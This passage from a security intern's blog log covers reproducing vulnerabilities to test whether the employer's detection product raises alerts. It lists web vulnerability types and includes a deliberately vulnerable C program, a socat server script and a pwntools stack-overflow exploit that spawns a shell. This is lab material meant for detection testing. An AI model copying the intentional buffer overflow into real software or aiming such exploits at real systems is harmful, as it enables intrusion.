<td align="center"></td>
</tr>
<tr>
<td align="center">shiro550</td>
<td align="center"></td>
<td align="center">7</td>
</tr>
<tr>
<td align="center">shiro721</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">爆破</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">unzip漏洞</td>
<td align="center"></td>
<td align="center">8</td>
</tr>
<tr>
<td align="center">ssti漏洞</td>
<td align="center"></td>
<td align="center">9</td>
</tr>
<tr>
<td align="center">fastjson 漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">jndi漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">越权漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">weblogic漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">log4j漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">CSRF漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">文件包含</td>
<td align="center"></td>
<td align="center">10</td>
</tr>
<tr>
<td align="center">敏感信息泄露</td>
<td align="center"></td>
<td align="center">11</td>
</tr>
<tr>
<td align="center">暗链</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">软件压缩目录泄露</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">CORS</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">目录浏览</td>
<td align="center"></td>
<td align="center">12</td>
</tr>
<tr>
<td align="center">spring-boot端点未授权</td>
<td align="center"></td>
<td align="center">13</td>
</tr>
<tr>
<td align="center">批量提交</td>
<td align="center"></td>
<td align="center">14</td>
</tr>
<tr>
<td align="center">swagger未授权</td>
<td align="center"></td>
<td align="center">15</td>
</tr>
<tr>
<td align="center">Thymeleaf远程命令执行（若依CMS）</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">Nginx主机实时监控流量数据泄露</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">Springboot Snake YAML 反弹shell</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<h2 id="五月"><a href="#五月" class="headerlink" title="五月"></a>五月</h2><h3 id="29日-1"><a href="#29日-1" class="headerlink" title="29日"></a>29日</h3><p>入职，简单了解公司的产品，公司的一些内部的东西。</p>
<h3 id="30日"><a href="#30日" class="headerlink" title="30日"></a>30日</h3><p>搭建漏洞环境进行测试。</p>
<p>很坑的点有：systemctl stop firewalld.service 关闭防火墙</p>
<p>主要是搭建环境测试公司产品会对漏洞进行报警吗</p>
<p>然后今天学到了一些网络的设置，怎么快速搭建服务器之类的</p>
<h3 id="31日-1"><a href="#31日-1" class="headerlink" title="31日"></a>31日</h3><p>今日搭建的漏洞环境为简单的栈溢出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;unistd.h&gt;</span><br><span class="line"></span><br><span class="line">int mainFun()&#123;</span><br><span class="line">   char s;</span><br><span class="line">   fgets(s,50,stdin);</span><br><span class="line">   return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void evilFun()&#123;</span><br><span class="line">  printf(&quot;It&#x27;s a evilFun&quot;);</span><br><span class="line">  system(&quot;/bin/bash&quot;);</span><br><span class="line">  return;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main()&#123;</span><br><span class="line">    mainFun();</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">#name:pwn.sh</span><br><span class="line">socat tcp-l:端口号，fork exec:程序位置，reuseaddr</span><br><span class="line">socat tcp-l:54321,fork exec:./test，reuseaddr #socat tcp-l:端口号，fork exec:程序位置，reuseaddr</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">p=remote(&quot;192.168.118.128&quot;, 54321)</span><br><span class="line">payload=b&#x27;a&#x27;*1+b&#x27;a&#x27;*8+p64(0x400624)</span><br><span class="line">print(payload)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc -o test -fno-stack-protector -z execstack test.c</span><br></pre></td></tr></table></figure>

<p>以及go的生成可执行程序需要（导师要求编译生成linux下的可执行程序）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">go env -w GOPROXY=https://goproxy.cn</span><br></pre></td></tr></table></figure>


    </div>

    
    
    <div class="post-widgets">
      <div id="needsharebutton-postbottom">
        <span class="btn">
          <i class="fa fa-share-alt" aria-hidden="true"></i>
        </span>
      </div>
    </div>

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%97%A5%E5%B8%B8%E8%AE%B0%E5%BD%95-%E5%AE%89%E5%85%A8%E6%9C%8D%E5%8A%A1%E5%AE%9E%E4%B9%A0%E7%94%9F/" rel="tag"><i class="fa fa-tag"></i> 日常记录 安全服务实习生</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/09/sagemathStudy/" rel="prev" title="sagemathStudy">
      <i class="fa fa-chevron-left"></i> sagemathStudy
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/03/15/%E5%AE%89%E5%85%A8%E6%9C%8D%E5%8A%A1%E5%85%A5%E9%97%A8/" rel="next" title="安服基本知识">
      安服基本知识 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>
      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E6%81%92"><span class="nav-number">1.</span> <span class="nav-text">安恒</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%89%E6%9C%88"><span class="nav-number">1.1.</span> <span class="nav-text">三月</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#15%E6%97%A5"><span class="nav-number">1.1.1.</span> <span class="nav-text">15日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#17%E6%97%A5"><span class="nav-number">1.1.2.</span> <span class="nav-text">17日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20%E6%97%A5"><span class="nav-number">1.1.3.</span> <span class="nav-text">20日</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%AC%E4%BC%97%E5%8F%B7%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.1.3.1.</span> <span class="nav-text">公众号漏洞</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20%E6%97%A5%EF%BC%9A"><span class="nav-number">1.1.4.</span> <span class="nav-text">20日：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#22%E6%97%A5%EF%BC%9A"><span class="nav-number">1.1.5.</span> <span class="nav-text">22日：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#24%E6%97%A5%EF%BC%9A"><span class="nav-number">1.1.6.</span> <span class="nav-text">24日：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#27%E6%97%A5%EF%BC%9A"><span class="nav-number">1.1.7.</span> <span class="nav-text">27日：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#29%E6%97%A5"><span class="nav-number">1.1.8.</span> <span class="nav-text">29日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#31%E6%97%A5"><span class="nav-number">1.1.9.</span> <span class="nav-text">31日</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9B%9B%E6%9C%88"><span class="nav-number">1.2.</span> <span class="nav-text">四月</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#03%E6%97%A5"><span class="nav-number">1.2.1.</span> <span class="nav-text">03日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#07%E6%97%A5"><span class="nav-number">1.2.2.</span> <span class="nav-text">07日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#10%E6%97%A5"><span class="nav-number">1.2.3.</span> <span class="nav-text">10日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#12%E6%97%A5"><span class="nav-number">1.2.4.</span> <span class="nav-text">12日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#14%E6%97%A5"><span class="nav-number">1.2.5.</span> <span class="nav-text">14日</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%AE%89%E8%8A%AF%E7%BD%91%E7%9B%BE"><span class="nav-number">2.</span> <span class="nav-text">安芯网盾</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E5%A4%8D%E7%8E%B0%E6%83%B3%E6%B3%95"><span class="nav-number">2.1.</span> <span class="nav-text">环境复现想法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%94%E6%9C%88"><span class="nav-number">2.2.</span> <span class="nav-text">五月</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#29%E6%97%A5-1"><span class="nav-number">2.2.1.</span> <span class="nav-text">29日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#30%E6%97%A5"><span class="nav-number">2.2.2.</span> <span class="nav-text">30日</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#31%E6%97%A5-1"><span class="nav-number">2.2.3.</span> <span class="nav-text">31日</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->
      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="ZER0"
      src="/images/cat.gif">
  <p class="site-author-name" itemprop="name">ZER0</p>
  <div class="site-description" itemprop="description">太刀は至上である.</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>
      
      
        <div class="links-of-blogroll motion-element links-of-blogroll-block">
          <div class="links-of-blogroll-title">
            <!-- modify icon to fire by szw -->
            <i class="fa fa-history fa-" aria-hidden="true"></i>
            近期文章
          </div>
          <ul class="links-of-blogroll-list">
            
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
          </ul>
        </div>
      

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ZER0</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">195k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">2:58</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  <script src="//cdn.jsdelivr.net/gh/theme-next/theme-next-needmoreshare2@1/needsharebutton.min.js"></script>
  <script>
      pbOptions = {};
        pbOptions.iconStyle = "box";
        pbOptions.boxForm = "horizontal";
        pbOptions.position = "bottomCenter";
        pbOptions.networks = "Wechat,QQZone,Weibo,Douban,Twitter,Facebook";
      new needShareButton('#needsharebutton-postbottom', pbOptions);
  </script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/nico.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>
